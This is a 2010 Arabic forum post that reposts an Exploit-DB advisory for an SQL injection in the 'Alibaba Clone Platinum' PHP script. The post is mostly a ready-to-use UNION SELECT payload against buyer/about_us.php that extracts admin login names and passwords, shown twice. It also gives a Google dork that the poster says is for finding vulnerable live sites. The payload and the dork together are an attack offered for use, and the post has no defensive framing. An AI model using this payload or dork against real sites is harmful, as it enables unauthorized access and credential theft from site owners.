| Dr.NaNo | 05-16-2010 02:27 AM |
Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability
اقتباس:
# title: Alibaba clone platinum (about_us.php) sql injection vulnerability
# edb-id: 12612
# cve-id: ()
# osvdb-id: ()
# author: Cobra_21
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a
view source
print?
-------------------------------------------------------------------------------------------
alibaba clone platinum (about_us.php) sql injection vulnerability
-------------------------------------------------------------------------------------------
author: Cobra_21
mail: uyku_cu@windowslive.com
script home: http://www.alibabaclone.com/
price: $699 usd
dork: Inurl:buyer/about_us.php?buyerid
-------------------------------------------------------------------------------------------
sql injection:
http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin
-------------------------------------------------------------------------------------------
|
الإستغلال .:
اقتباس:
http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin
| الدورك للبحث عن المواقع المصابه في محركات البحث مثل قوقل .:
اقتباس:
inurl:buyer/about_us.php?buyerid
| |
